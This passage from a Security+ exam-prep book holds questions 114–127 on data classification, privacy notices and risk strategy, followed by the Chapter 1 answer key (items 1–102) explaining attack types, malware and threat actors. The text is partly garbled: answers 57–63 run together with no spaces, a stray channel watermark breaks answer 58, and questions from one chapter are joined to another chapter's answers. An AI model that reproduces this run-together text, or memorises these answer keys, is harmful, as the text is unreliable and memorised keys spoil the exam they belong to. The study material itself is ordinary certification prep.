114. Susan works for the U.S. government and has identified information in her organization that requires some protection. If the information were disclosed without authorization, it would cause identifiable harm to national security. How should she classify the data?
A. Top Secret
B. Secret
C. Confidential
D. Business Sensitive
115. Ed serves as his organization's data steward and wants to classify each data element that is used in their business. How should he classify cell phone numbers?
A. As PHI
B. As financial information
C. As PII
D. As government information
116. Marcus wants to ensure that attackers can't identify his customers if they were to gain a copy of his organization's web application database. He wants to protect their Social Security numbers (SSNs) with an alternate value that he can reference elsewhere when he needs to look up a customer by their SSN. What technique should he use to accomplish this?
A. Encryption
B. Tokenization
C. Data masking
D. Data washing
117. Which of the following is the most common reason to include a privacy notice on a website?
A. To warn attackers about security measures
B. To avoid lawsuits
C. Due to regulations or laws
D. None of the above
118. Nicole determines how her organization processes data that it collects about its customers and also decides how and why personal information should be processed. What role does Nicole play in her organization?
A. Data steward
B. Data custodian
C. Data controller
D. Data consumer
119. The virtual machine cluster that Pat is in charge of has suffered a major failure in its primary controller. The entire organization is offline, and customers cannot get to the organization's website, which is its primary business. What type of disaster has Pat's organization experienced?
A. An MRO disaster
B. An internal disaster
C. An RTO disaster
D. An external disaster
120. What important step should be taken early in the information lifecycle to ensure that organizations can handle the data they collect?
A. Data retention
B. Data classification
C. Data minimization
D. Data exfiltration
121. Kirk's organization has been experiencing large-scale denial-of-service (DoS) attacks against their primary website. Kirk contracts with his Internet service provider to increase the organization's bandwidth and expands the server pool for the website to handle significantly more traffic than any of the previous DoS attacks. What type of risk management strategy has he employed?
A. Acceptance
B. Avoidance
C. Transfer
D. Mitigation
122. The co-location facility that Joanna contracts to host her organization's servers is in a floodplain in a hurricane zone. What type of risk best describes the risk that Joanna and other customers face?
A. A multiparty risk
B. An internal risk
C. A legacy risk
D. An IP theft risk
123. The cloud service that Natasha's organization has used for the past five years will no longer be available. What phase of the vendor relationship should Natasha plan for with this service?
A. Preparing a service MOU
B. An EOL transition process
C. Creating an NDA
D. A last will and testament
124. Gary wants to use a secure configuration benchmark for his organization for Linux. Which of the following organizations would provide a useful, commonly adopted benchmark that he could use?
A. Microsoft
B. NIST
C. CIS
D. All of the above
125. After Angela left her last organization, she discovered that she still had access to her shared drives and could log into her email account. What critical process was likely forgotten when she left?
A. An exit interview
B. Job rotation
C. Offboarding
D. Governance
126. Frank knows that businesses can use any classification labels they want, but he also knows that there are a number of common labels in use. Which of the following is not a common data classification label for businesses?
A. Public
B. Sensitive
C. Private
D. Secret
127. Where are privacy notices frequently found?
A. The terms of an agreement for customers
B. A click-through license agreement
C. A website usage agreement
D. All of the above
Chapter 1: Threats, Attacks, and Vulnerabilities
1. C. The correct answer is spear phishing. Spear phishing is targeted to a specific group, in this case insurance professionals. Although this is a form of phishing, the more specific answer is the one you will need to choose on questions like this. Phishing uses social engineering techniques to succeed but is once again a broader answer than spear phishing and thus is not the correct choice. Finally, a Trojan horse pretends to be a legitimate or desirable program or file, which this scenario doesn't describe.
2. B. A logic bomb is malware that performs its malicious activity when some condition is met. A worm is malware that self-propagates. A Trojan horse is malware attached to a legitimate program, and a rootkit is malware that gets root or administrative privileges.
3. C. This is a very basic form of SQL injection. Cross-site scripting would have JavaScript in the text field and would be designed to impact other sites from a user's session. Cross-site request forgery would not involve any text being entered in the web page, and ARP poisoning is altering the ARP table in a switch; it is not related to website hacking.
4. B. This describes a jamming attack, where legitimate traffic is interfered with by another signal. Jamming can be intentional or unintentional and may be intermittent. IV attacks are obscure cryptographic attacks on stream ciphers. Wi-Fi protected setup (WPS) uses a PIN to connect to the wireless access point (WAP). The WPS attack attempts to intercept that PIN in transmission, connect to the WAP, and then steal the WPA2 password. A botnet is a group of machines that are being used, without their consent, as part of an attack.
5. B. The best option listed to defend against the attacks mentioned is input validation. Encrypting the web traffic will not have any effect on these two attacks. A web application firewall (WAF) might mitigate these attacks, but it would be secondary to input validation, and an intrusion detection system (IDS) will simply detect the attack—it won't stop it.
6. C. If users have been connecting but the AP does not show them connecting, then they have been connecting to a rogue access point. This could be the cause of an architecture and design weakness such as a network without segmentation and control of devices connecting to the network. Session hijacking involves taking over an already authenticated session. Most session hijacking attacks involve impersonation. The attacker attempts to gain access to another user's session by posing as that user. Clickjacking involves causing visitors to a website to click on the wrong item. Finally, bluejacking is a Bluetooth attack.
7. C. Cross-site scripting involves entering a script into text areas that other users will view. SQL injection is not about entering scripts, but rather SQL commands. Clickjacking is about tricking users into clicking on the wrong thing. Bluejacking is a Bluetooth attack.
8. D. Retaining the actual password is not a best practice, and thus encrypting password plaintext is not a common technique to make passwords harder to crack. Since the application would need the cryptographic key to read the passwords, anybody who had access to that key could decrypt the passwords. Using a salt, a pepper, and a cryptographic hashing algorithm designed for passwords are all common best practices to prevent offline brute-force attacks.
9. A. Although this is one of the more dated items on the Security+ exam outline, you need to know that the term for Internet messaging spam messages is SPIM. The rest of the answers were made up, and though this shows up in the exam outline, the rest of the world has moved on from using this term.
10. B. A segmentation fault will typically stop the program from running. This type of issue is why a NULL pointer or other pointer de-referencing error is considered a potential security issue, as a denial-of-service condition impacts the availability of the service. This type of error is unlikely to cause a data breach or allow privilege escalation, and permissions creep occurs as individuals accrue more permissions over time in a single organization as their permissions are not cleaned up when they switch positions or roles.
11. C. The machines in her network are being used as bots, and the users are not aware that they are part of a distributed denial-of-service (DDoS) attack. Social engineering is when someone tries to manipulate you into giving information. Techniques involved in social engineering attacks include consensus, scarcity, and familiarity. There is a slight chance that all computers could have a backdoor, but that is very unlikely, and attackers normally don't manually log into each machine to do a DDoS—it would be automated, as through a bot.
12. C. There are many indicators of compromise (IoCs), including unusual outbound network traffic, geographical irregularities like logins from a country where the person normally does not work, or increases in database read volumes beyond normal traffic patterns. Predictive analysis is analysis work done using datasets to attempt to determine trends and likely attack vectors so that analysts can focus their efforts where they will be most needed and effective. OSINT is open source intelligence, and threat maps are often real-time or near real-time visualizations of where threats are coming from and where they are headed to.
Use the following scenario for questions 13–15.
Chris has recently deployed a security information and event management (SIEM) device and wants to use it effectively in his organization. He knows that SIEM systems have a broad range of capabilities and wants to use the features to solve problems that he knows his organization faces. In each of the following questions, identify the most appropriate SIEM capability or technique to accomplish what Chris needs to do for his organization.
13. B. When troubleshooting TCP handshakes, the most valuable tool in many cases is packet capture. If Chris sees a series of SYN packets without the handshake being completed, he can be reasonably sure the firewall is blocking traffic. Reviewing reports or logs may be useful for this as well but won't show the TCP handshake issue mentioned in the problem, and sentiment analysis is focused on how individuals and groups are responding, not on a technical problem.
14. D. User behavior analysis is a key capability when attempting to detect potential insider threats. Chris can use his SIEM's behavioral analysis capabilities to detect improper or illicit use of rights and privileges as well as abnormal behavior on the part of his users. Sentiment analysis helps analyze feelings, and log aggregation and security monitoring provide ways to gain insight into the overall security posture and status of the organization.
15. A. Using log aggregation to pull together logs from multiple sources, and performing collection and initial analysis on log collectors can help centralize and handle large log volumes. Capturing packets is useful for network traffic analysis to identify issues or security concerns. Security monitoring is an overall function for security information and event management (SIEM) and doesn't specifically help with this need. Both sentiment analysis and user behavior analysis are aimed at users and groups rather than at how data is collected and managed.
16. B. White teams act as judges and observers during cybersecurity exercises. Blue teams act as defenders, red teams act as attackers, and purple teams are composed of both blue and red team members to combine attack and defense knowledge to improve organizational security.
17. A. The simplest way to ensure that APIs are only used by legitimate users is to require the use of authentication. API keys are one of the most frequently used methods for this. If an API key is lost or stolen, the key can be invalidated and reissued, and since API keys can be matched to usage, Cynthia's company can also bill customers based on their usage patterns if they want to. A firewall or IP restrictions may be able to help, but they can be fragile; customer IP addresses may change. An intrusion prevention system (IPS) can detect and prevent attacks, but legitimate usage would be hard to tell from those who are not customers using an IPS.
18. B. Buffer overflow attacks cram more data into a field or buffer than they can accept, overflowing into other memory locations and either crashing the system or application, or potentially allowing code to be inserted into executable locations. Bluesnarfing and bluejacking are both Bluetooth attacks. Cross-site scripting attacks allow attackers to inject scripts into pages viewed by other users.
19. A. Attackers are attempting to influence Gurvinder with a combination of scarcity and urgency. Thus, for this question you should answer scarcity since urgency is not listed. In many social engineering principle questions, more than one of the principles may be in play, and you will need to answer with the principle that is correct or more correct for the question. In this case, there is no intimidation or claim to authority, and consensus would require some form of validation from others.
20. A. Vulnerability scans use automated tools to look for known vulnerabilities in systems and applications and then provide reports to assist in remediation activities. Penetration tests seek to actually exploit the vulnerabilities and break into systems. Security audits usually focus on checking policies, incident reports, and other documents. Security test is a generic term for any sort of test.
21. C. Username complexity has no impact in credential harvesting. Multifactor authentication can help prevent successful credential harvesting by ensuring that even capture of username and password is not enough to compromise the account. Awareness training helps to reduce the likelihood of credential exposure, and limiting or preventing use of third-party web scripts makes websites less likely to have credentials stolen through the use of those scripts, plug-ins, or modules.
22. C. Greg can clone a legitimate Media Access Control (MAC) address if he can identify one on the network. This can be as easy as checking for a MAC label on some devices or by capturing traffic on the network if he can physically access it.
23. A. From the description it appears that they are not connecting to the real web server but rather a fake server. That indicates typosquatting: have a URL that is named very similarly to a real site so that when users mistype the real site's URL they will go to the fake site.
Options B, C, and D are all incorrect. These are all methods of attacking a website, but in this case, the actual website was not attacked. Instead, some users are visiting a fake site.
24. C. Domain hijacking, or domain theft, occurs when the registration or other information for the domain is changed without the original registrant's permission. This may occur because of a compromised account or due to a breach of the domain registrar's security. A common issue is a lapsed domain being purchased by a third party, and this can look like a hijacked domain, but it is a legitimate occurrence if the domain is not renewed! DNS hijacking inserts false information into a DNS server, on-path (man-in-the-middle) attacks capture or modify traffic by causing the traffic to pass through a compromised midpoint, and zero-day attacks are attacks that use an unknown until used vulnerability.
25. D. The term for low-skilled hackers is script kiddie. Script kiddies typically use prebuilt tools and do not have the expertise to make or modify their own tools. Nothing indicates this is being done for ideological reasons, and thus that a hacktivist is involved. Although "Amateur" may be an appropriate description, the correct term is script kiddie. Finally, nothing in this scenario indicates an insider threat.
26. B. Phishing is intended to acquire data, most often credentials or other information that will be useful to the attacker. Spam is a broader term for unwanted email, although the term is often generally used to describe unwanted communications. Spear phishing targets specific individuals, whereas whaling targets important people in an organization. Smishing is sent via SMS (text message). Malware can be sent in any of these instances, but there is not a specific related term that means "spam with malware in it."
27. B. A collection of computers that are compromised, then centrally controlled to perform actions like denial-of-service attacks, data collection, and other malicious activities is called a botnet. Zombienets, Nullnets, and Attacknets are not commonly used terms to describe botnets.
28. B. Systems and software that no longer have vendor support can be a significant security risk, and ensuring that a vendor will continue to exist and provide support is an important part of many procurement processes. Selah's questions are intended to assess the longevity and viability of the company and whether buying from them will result in her organization having a usable product for the long term.
29. B. Passive reconnaissance is any reconnaissance that is done without actually connecting to the target. In this case, John is conducting a form of OSINT, or open source intelligence, by using commonly available third-party information sources to gather information about his target. Active reconnaissance involves communicating with the target network, such as doing a port scan. The initial exploitation is not information gathering; it is actually breaking into the target network. A pivot is when you have breached one system and use that to move to another system.
30. A. Server-side request forgery (SSRF) attempts typically attempt to get HTTP data passed through and will not include SQL injection. Blocking sensitive hostnames, IP addresses, and URLs are all valid ways to prevent SSRF, as is the use of whitelist-based input filters.
31. A. Domain Name System (DNS) poisoning attacks attempt to insert incorrect or malicious entries into a trusted DNS server. Address Resolution Protocol (ARP) poisoning involves altering the MAC-IP tables in a switch. Although cross-site scripting (XSS) and cross-site request forgery (CSRF or XSRF) are both types of attacks, neither is a poisoning attack.
32. C. An unknown environment test is also called black-box or a zero-knowledge test because it does not provide information beyond the basic information needed to identify the target. A known environment, or white-box test, involves very complete information being given to the tester. This scenario is probably done from outside the network, but external test is not the correct terminology. Threat test is not a term used in penetration testing.
33. D. A pivot occurs when you exploit one machine and use that as a basis to attack other systems. Pivoting can be done from internal or external tests. White- and black-box testing describes the amount of information the tester is given in advance, not how the tester performs the test.
34. A. Shimming is when the attacker places some malware between an application and some other file and intercepts the communication to that file (usually to a library or system API). In many cases, this is done with a driver for a hardware component. A Trojan horse might be used to get the shim onto the system, but that is not described in this scenario. A backdoor is a means to circumvent system authorization and get direct access to the system. Refactoring is the process of changing names of variables, functions, and so forth in a program.
35. C. SOAR is a relatively new category as defined by Gartner. Security orchestration, automation, and response includes threat and vulnerability management, security incident response, and security operations automation, but not automated malware analysis.
36. C. Domain reputation services like ReputationAuthority, Cisco's Talos, McAfee's trustedsource.org, and Barracuda's barracudacentral.org sites all provide domain reputation data that allow you to look up a domain or IP address to determine if it is currently blacklisted or has a poor reputation.
37. B. His machines are part of a distributed denial-of-service (DDoS) attack. This scenario describes a generic DDoS, not a specific one like SYN flood, which would involve many SYN packets being sent without a full three-way TCP handshake. These machines could be part of a botnet or they may just have a trigger that causes them to launch the attack at a specific time. The real key in this scenario is the DDoS attack. Finally, a backdoor gives an attacker access to the target system.
38. B. Since open Wi-Fi hotspots do not have a way to prove they are legitimate, they can be easily spoofed. Attackers can stand up a fake version of the hotspot and then conduct an SSL stripping attack by inserting themselves into sessions that victims attempt to open to secure servers.
39. B. A Trojan horse attaches a malicious program to a legitimate program. When the user downloads and installs the legitimate program, they get the malware. A logic bomb is malware that does its misdeeds when some condition is met. A rootkit is malware that gets administrative, or root, access. A macro virus is a virus that is embedded in a document as a macro.
40. D. Whaling is targeting a specific individual who is important in the organization like the president or chief financial officer (CFO). Spear phishing targets specific individuals or groups, but whaling is more specific in terms of the importance of the individuals involved. Targeted phishing is not a term used in the industry. Phishing is the generic term for a wide range of related attacks, and you should choose the most accurate answer for questions like this.
41. D. Criminal syndicates may produce, sell, and support malware tools, or may deploy them themselves. Cryptomalware and other packages are examples of tools often created and used by criminal syndicates. State actors are more likely to be associated with advanced persistent threats (APTs) aimed at accomplishing goals of the nation-state that supports them. Hacktivists typically have political motivations, whereas script kiddies may simply be in it for recognition or fun.
42. A. A rainbow table is a table of precomputed hashes, used to retrieve passwords. A backdoor is used to gain access to a system, not to recover passwords. Social engineering and dictionary attacks can both be used to gain access to passwords, but they are not tables of precomputed hashes.
43. B. The most common concern that will arise when a vendor no longer supports a device is a lack of updates or patches. This is particularly concerning when the devices are operational technology such as utility, lighting, or other infrastructure control devices that have a very long lifecycle and control important processes or systems. Although improper data storage, lack of documentation, and configuration issues can all be issues, lack of updates and patching remains the biggest and most frequent issue.
44. A. Bluejacking involves sending unsolicited messages to Bluetooth devices when they are in range. Bluesnarfing involves getting data from the Bluetooth device. An evil twin attack uses a rogue access point whose name is similar or identical to that of a legitimate access point.
45. A. Since Dennis is able to view the web traffic before it is sent to the actual server, he should be able to conduct a plain-text password attack by intercepting the password. Pass-the-hash attacks are typically used inside Windows environments, SQL injection would attack the server, and cross-site scripting is possible but not as likely as the plain-text password attack in this scenario.
46. A. Dumpster diving is the term for rummaging through the waste/trash to recover useful documents or materials. Penetration testers and attackers may dumpster-dive as part of their efforts. In fact, emptying trash cans in a location can provide useful information even without jumping into a dumpster! Trash diving and trash engineering are not the terms used in the industry. Nothing in this scenario describes social engineering.
47. A. This is a remote-access Trojan (RAT), malware that opens access for someone to remotely access the system. A worm would have spread itself via a vulnerability, whereas a logic bomb runs when some logical condition is met. Finally, a rootkit provides root or administrative access to the system.
48. B. Zero-day exploits are new, and they are not in the virus definitions for the antivirus (AV) programs. This makes them difficult to detect, except by their behavior. RATs, worms, and rootkits are more likely to be detected by AV programs.
49. D. Radio frequency identifier (RFID) attacks typically focus on data capture, spoofing RFID data, or conducting a denial-of-service attack. Birthday attacks are used against cryptosystems, which may be part of an RFID tag environment, but they aren't a common attack against RFID systems.
50. C. Initialization vectors are used with stream ciphers. An IV attack attempts to exploit a flaw to use the IV to expose encrypted data. Nothing in this scenario requires or describes a rogue access point/evil twin. Wi-Fi Protected Setup (WPS) uses a PIN to connect to the wireless access point (WAP). The WPS attack attempts to intercept that PIN in transmission, connect to the WAP, and then steal the WPA2 password.
51. C. This description does not include any risk to availability since there is no information about systems or services being down or offline. This scenario would likely result in reputational, financial, and data loss impacts for Scott's company.
52. B. Cross-site request forgery (XSRF or CSRF) sends fake requests to a website that purport to be from a trusted, authenticated user. Cross-site scripting (XSS) exploits the trust the user has for the website and embeds scripts into that website. Bluejacking is a Bluetooth attack. Nothing in this scenario requires or describes an evil twin, which is an attack that uses a malicious access point that duplicates a legitimate AP.
53. A. Cyber intelligence fusion is the process of gathering, analyzing, and then distributing information between disparate agencies and organizations. Fusion centers like those operated by the U.S. Department of Homeland Security (DHS) focus on strengthening shared intelligence activities. They are not specifically tasked with building tools by combining other tools, although they may in some cases. They are not power plants, and they are focused on gathering and sharing information, not building a classification structure.
54. B. The Common Vulnerabilities and Exposures (CVE) list has entries that describe and provide references to publicly known cybersecurity vulnerabilities. A CVE feed will provide updated information about new vulnerabilities and a useful index number to cross reference with other services.
55. B. A birthday attack exploits the birthday problem in probability theory and relies on finding collisions between random attack attempts and the number of potential permutations of a solution. Birthday attacks are one method of attacking cryptographic hash functions. They are not a social engineering attack, a network denial-of-service attack, or a TCP/IP protocol attack.
56. B. This is an example of a disassociation attack. The deauthentication packet causes Juanita's system to disassociate, and the attacker can then execute a second attack targeting her authentication credentials or other wireless data using an evil twin attack. Misconfiguration won't cause authenticated users to deauthenticate. Session hijacking involves taking over an authenticated session. Backdoors are built-in methods to circumvent authentication.
57. A. Dictionaryattacksusealistofwordsthatarebelievedtobelikelypasswords.Arainbowtableisaprecomputedtableofhashes.Bruteforcetrieseverypossiblerandomcombination.Ifanattackerhastheoriginalplaintextandciphertextforamessage,theycandeterminethekeyspaceusedthroughbrute-forceattemptstargetingthekeyspace.Sessionhijackingiswhentheattackertakesoveranauthenticatedsession.
58. B. DowngradeattacksseektomakeaTransportLayerSecurity(TLS)connectionuseaweakercipherversion,thusallowingtheattackertomoreeasilybreaktheencryptionandreadtheprotecteddata.Inadisassociationattack,theattackerattemptstoforcethevictimintodisassociatingfroma
Telegram Channel @nettrain
resource.Sessionhijackingiswhentheattackertakesoveranauthenticatedsession.Brute-forceattemptseverypossiblerandomcombinationtogetthepasswordorencryptionkey.
59. D. Acollisioniswhentwodifferentinputsproducethesamehash.Arainbowtableisatableofprecomputedhashes.Bruteforceattemptseverypossiblerandomcombinationtogetthepasswordorencryptionkey.Sessionhijackingiswhentheattackertakesoveranauthenticatedsession.
60. C. Anadvancedpersistentthreat(APT)involvessophisticated(i.e.,advanced)attacksoveraperiodoftime(i.e.,persistent).Adistributeddenial-of-service(DDoS)couldbeapartofanAPT,butinandofitselfisunlikelytobeanAPT.Bruteforceattemptseverypossiblerandomcombinationtogetthepasswordorencryptionkey.Inadisassociationattack,theattackerattemptstoforcethevictimintodisassociatingfromaresource.
61. B. Phishingisnotcommonlyusedtoacquireemailaddresses.Phishingemailstargetpersonalinformationandsensitiveinformationlikepasswordsandcreditcardnumbersinmostcases.
62. A. WhenanIDSorantivirusmistakeslegitimatetrafficforanattack,thisiscalledafalsepositive.AfalsenegativeiswhentheIDSmistakesanattackforlegitimatetraffic.Itistheoppositeofafalsepositive.OptionsCandDarebothincorrect.Althoughthesemaybegrammaticallycorrect,thesearenotthetermsusedintheindustry.Inmilitaryoperations,falseflagoperationsattempttotransferblametoanothercompany,thusa“falseflag.”
63. B. Akeyloggerisasoftwareorhardwaretoolusedtocapturekeystrokes.Keyloggersareoftenusedbyattackerstocapturecredentialsandothersensitiveinformation.Arootkitisusedtoobtainandmaintainadministrativerightsonasystem,andawormisaself-spreadingformofmalwarethatfrequentlytargetsvulnerableservicesonanetworktospread.
64. A. The term for attempting to gain any privileges beyond what you have is privilege escalation. Session hijacking is taking over an authenticated session. Root grabbing and climbing are not terms used in the industry.
65. B. MAC flooding attacks attempt to overflow a switch’s CAM table, causing the switch to send all traffic to all ports rather than to the port that a given MAC address is associated with. Although this was possible with many older switches, most modern switches are less susceptible to this type of attack, and some have security capabilities built in to prevent this type of attack.
66. B. Spyware and adware are both common examples of PUPs, or potentially unwanted programs. Though not directly malicious, they can pose risks to user privacy as well as create annoyances like pop-ups or other unwanted behaviors. Trojans appear to be legitimate programs or are paired with them, RATs provide remote access and are a subcategory of Trojans, and ransomware demands payment or other actions to avoid damage to files or reputation.
67. C. A race condition can occur when multiple threads in an application are using the same variable and the situation is not properly handled. Option A is incorrect. A buffer overflow is attempting to put more data in a buffer than it is designed to hold. Option B is incorrect. A logic bomb is malware that performs its misdeed when some logical condition is met. Option D is incorrect. As the name suggests, improper error handling is the lack of adequate or appropriate error handling mechanisms within software.
68. B. The malware in this example is a Trojan horse—it pretends to be something desirable, or at least innocuous, and installs malicious software in addition to or instead of the desired software. A rootkit gives root or administrative access, spyware is malware that records user activities, and a boot sector virus is a virus that infects the boot sector of the hard drive.
69. B. The Postgres server is set up using a weak password for the user postgres, the administrative login for the database. This is a form of unsecured administrative or root account. Interestingly, this is not a default setting, since Postgres uses no password by default for the Postgres account—an even worse setting than using postgres as the password, but not by much!
70. A. Annie has moved laterally. Lateral movement moves to systems at the same trust level. This can provide access to new data or different views of the network depending on how the systems and security are configured. Privilege escalation involves gaining additional privileges, often those of an administrative user. Vertical movement is sometimes referenced when gaining access to systems or accounts with a higher security or trust level. Privilege retention was made up for this question.
71. A. This is an example of a false positive. A false positive can cause a vulnerability to show that was not actually there. This sometimes happens when a patch or fix is installed but the application does not change in a way that shows the change, and it has been an issue with updates where the version number is the primary check for a vulnerability. When a vulnerability scanner sees a vulnerable version number but a patch has been installed that does not update it, a false positive report can occur. A false negative would report a patch or fix where there was actually a vulnerability. Automatic updates were not mentioned, nor was a specific Apache version.
72. C. A buffer overflow is possible when boundaries are not checked and the attacker tries to put in more data than the variable can hold. Cross-site scripting (XSS) is a web page attack. Cross-site request forgery (CSRF) is a web page attack. A logic bomb is malware that performs its misdeed when some condition is met.
73. C. Consensus, sometimes called social proof, is a social engineering principle that leverages the fact that people are often willing to trust groups of other people. Here, the attackers have planted false information that the software is trustworthy, thus allowing targets to “prove” to themselves that they can safely install the software. Scarcity uses a perception that something may not be available or is uncommon and thus desirable. Familiarity takes advantage of the trust that individuals put into people and organizations they are already familiar with. Trust-based attacks exploit a perception of trustworthiness.
74. B. A logic bomb performs malicious actions when a specific condition or conditions are met. A boot sector virus infects the boot sector of the hard drive. A buffer overflow occurs when the attacker attempts to put more data in a variable than it can hold. A sparse infector virus performs its malicious activity intermittently to make it harder to detect.
75. B. Elicitation, or the process of eliciting information through conversation to gather useful information, is a key tool in a penetration tester’s social engineering arsenal. Pretexting involves the use of believable reasons for the target to go along with whatever the social engineering is attempting to do. Impersonation involves acting like someone you are not, whereas intimidation attempts to scare or threaten the target into doing what the social engineer wants them to.
76. B. All of these protocols are unsecure. FTP has been replaced by secure versions in some uses (SFTP/FTPS), whereas Telnet has been superseded by SSH in modern applications. RSH is outmoded and should be seen only on truly ancient systems. If you find a system or device exposing these protocols, you will need to dig in further to determine why they are exposed and how they can be protected if they must remain open for a legitimate reason.
77. B. The best way for Scott to determine where an organization’s wireless networks can be accessed from is to use wardriving, warflying, and/or warwalking techniques to map out the wireless signal footprint of the organization. OSINT and active scans would be useful for gathering information about the organization and its systems, but not about its wireless networks’ range and accessibility, and social engineering is more likely to be useful for gathering information or gaining access to facilities or systems.
78. A. A macro virus is a malicious script (macro) embedded into a file, typically a Microsoft Office file. They are typically written in Visual Basic for Applications (VBA) script. A boot sector virus infects the boot sector of the hard drive. A Trojan horse is malware that is tied to a legitimate program. In this scenario, the malware is actually embedded in an Office document. The two are similar, but not the same. A remote access Trojan (RAT) is a Trojan horse that gives the attacker remote access to the machine.
79. C. By giving the tester logins, you are allowing them to conduct a credentialed scan (i.e., a scan with an account or accounts that allow them access to check settings and configurations). Known environment and partially known environment tests describe the level of knowledge the tester is given of the network. A privilege scan cannot be an unknown environment test, but it could be either known or partially known. An intrusive scan is a term used for scans that attempt to exercise or use the vulnerability they find instead of attempting to avoid harm.
80. B. The Security+ exam expects practitioners to be able to analyze scripts and code to determine roughly what function they perform and to be able to identify multiple programming languages. Python relies on formatting like indenting to indicate blocks of code and does not use line end indicators as you would find in some languages. This code is a basic Python port scanner that will scan every port from 1 to 9999, checking to see if it allows a connection.
81. C. Botnets are often used to launch DDoS attacks, with the attack coming from all the computers in the botnet simultaneously. Phishing attacks attempt to get the user to give up information, click on a link, or open an attachment. Adware consists of unwanted pop-up ads. A Trojan horse attaches malware to a legitimate program.
82. B. Amanda has discovered an insider threat. Insider threats can be difficult to discover, as a malicious administrator or other privileged user will often have the ability to conceal their actions or may actually be the person tasked with hunting for threats like this! This is not a zero-day—no vulnerability was mentioned, there was no misconfiguration since this was an intentional action, and encryption is not mentioned or discussed.
83. B. Social media influence campaigns seek to achieve the goals of the attacker or owner of the campaign. They leverage social media using bots and groups of posters to support the ideas, concepts, or beliefs that align with the goals of the campaign. Impersonation is a type of social engineering attack where the attacker pretends to be someone else. A watering hole attack places malware or malicious code on a site or sites that are frequently visited by a targeted group. Asymmetric warfare is warfare between groups with significantly different power or capabilities.
84. C. Using default settings is a form of weak configuration. Many vulnerability scanners and attack tools have default settings built in to test with, and default settings are easily obtained for most devices with a quick search of the Internet. Configuring the accounts is not the issue; changing default passwords and settings is. Although training users is important, that’s not the issue in this scenario. Patching systems is important, but that won’t change default settings.
85. D. In a DLL injection, the malware attempts to inject code into the process of some library. This is a rather advanced attack. Option A is incorrect. A logic bomb executes its misdeed when some condition is met. Option B is incorrect. Session hijacking is taking over an authenticated session. Option C is incorrect. Buffer overflows are done by sending more data to a variable than it can hold.
86. B. State actors (or nation-state actors) often have greater resources and skills, making them a more significant threat and far more likely to be associated with an advanced persistent threat actor. Script kiddies, hacktivists, and insider threats tend to be less capable and are all far less likely to be associated with an APT.
87. C. An intrusive scan attempts to actively exploit vulnerabilities, and thus could possibly cause some disruption of operations. For this reason, it should be conducted outside normal business hours or in a test environment, if it is used at all. A nonintrusive scan attempts to identify vulnerabilities without exploiting them. A penetration test actually attempts to breach the network by exploiting vulnerabilities. An audit is primarily a document check. Both intrusive and nonintrusive vulnerability scans can be effective at finding vulnerabilities.
88. C. A backdoor is a method for bypassing normal security and directly accessing the system. A logic bomb is malware that performs its misdeeds when some condition is met. A Trojan horse wraps a malicious program to a legitimate program. When the user downloads and installs the legitimate program, they get the malware. A rootkit is malware that gets root or administrative privileges.
89. D. The fact that the website is defaced in a manner related to the company’s public indicates that the attackers were most likely engaging in hacktivism to make a political or belief-based point. Scripts, nation-state actors, and organized crime don’t account for the statements adverse to the company’s policies, which is why hacktivism is the real cause.
90. A. Pharming attempts to redirect traffic intended for a legitimate site to another malicious site. Attackers most often do this by changing the local hosts file or by exploiting a trusted DNS server.
91. B. Password spraying is a specific type of brute force attack which uses a smaller list of common passwords for many accounts to attempt to log in. Although brute forcing is technically correct, the best match here is password spraying. When you encounter questions like this on the test, make sure you provide the most accurate answer, rather than one that fits but may not be the best answer. Limited login attacks is a made-up answer, and spinning an account refers to changing the password for an account, often because of a compromise or to prevent a user from logging back into it while preserving the account.
92. C. Although you might suppose that a nation-state attacker (the usual attacker behind an advanced persistent threat) would attack from a foreign IP address, they often use a compromised address in the target country as a base for attacks. Options A, B, and D are all incorrect. These are actually signs of an advanced persistent threat.
93. B. A privilege escalation attack can occur horizontally, where attackers obtain similar levels of privilege but for other users, or vertically where they obtain more advanced rights. In this case, Charles has discovered a vertical privilege escalation attack that has allowed the attacker to obtain administrative rights. Cross-site scripting and SQL injection are both common types of web application attacks, and a race condition occurs when data can be changed between when it is checked and when it is used.
94. A. Evil twin attacks use a malicious access point configured to appear to be identical to a legitimate AP. Attackers wait for their targets to connect via the evil twin, and can then capture or modify traffic however they wish. IP spoofing uses the IP address of a system already on the network, Trojan horses are malware that appear to be legitimate software or files, and privilege escalation is the process of using exploits to gain higher privileges.
95. A. A zero-day exploit or attack occurs before the vendor has knowledge of it. The remainder of the answers don’t accurately describe a zero-day attack—just because it has not yet been breached does not make it a zero-day, nor is a zero-day necessarily quickly exploitable. Finally, a zero-day attack does not specify how long the attacker may have access.
96. D. Prepending is one of the stranger terms that appear on the CompTIA Security+ exam and is not a commonly used phrase in the industry. Thus, you need to know that when it is used for this exam it can mean one of three things: adding an expression or phrase to an email, subject line, or headers to either protect or fool users. They also note that it can be used when adding data as part of an attack, and that social engineers may “prepend” information by inserting it into conversation to get targets to think about things the attacker wants them to. Pretexting is a social engineering technique where attackers use a reason that is intended to be believable to the target for what they are doing. SQL injection is an attempt to add SQL code to a web query to gain additional access or data. Prepending is used to cover a wide variety of techniques in the Security+ exam outline that focus on adding information or data to existing content.
97. D. Although auditing some libraries or libraries that are custom-developed for the code is common, auditing all libraries used in the code is unlikely except in exceptional situations. The remainder of these practices are all commonly used when working with outsourced code development teams.
98. C. DNS poisoning occurs when false DNS information is inserted into legitimate DNS servers, resulting in traffic being redirected to unwanted or malicious sites. A backdoor provides access to the system by circumventing normal authentication. An APT is an advanced persistent threat. A Trojan horse ties a malicious program to a legitimate program.
99. C. Spyware and adware are both common examples of a PUP, or potentially unwanted program. A CAT was made up for this question and is not a common categorization for malware, whereas worms are self-spreading malware that often exploit vulnerabilities to spread via a network. Trojans pretend to be legitimate software or are paired with legitimate software to gain entry to a system or device.
100. B. A Trojan horse pretends to be legitimate software, and may even include it, but also includes malicious software as well. Backdoors, RATs, and polymorphic viruses are all attacks, but they do not match what is described in the question scenario.
101. A. A remote access Trojan (RAT) is malware that gives the attacker remote access to the victim machine. Macro viruses operate inside of Microsoft Office files. Although a backdoor will give access, it is usually something in the system put there by programmers, not introduced by malware. A RAT is a type of Trojan horse, but a Trojan horse is more general than what is described in the scenario. When you encounter questions like this on the exam, you will need to select the best answer, not just one that may answer the question!
102. B. Card cloning often occurs after a skimming attack is used to capture card data, whether from credit cards or entry access cards. Brute-force and rainbow table-based attacks are both used against passwords, whereas a birthday attack is a cryptographic attack often aimed at finding two messages that hash to the same value.
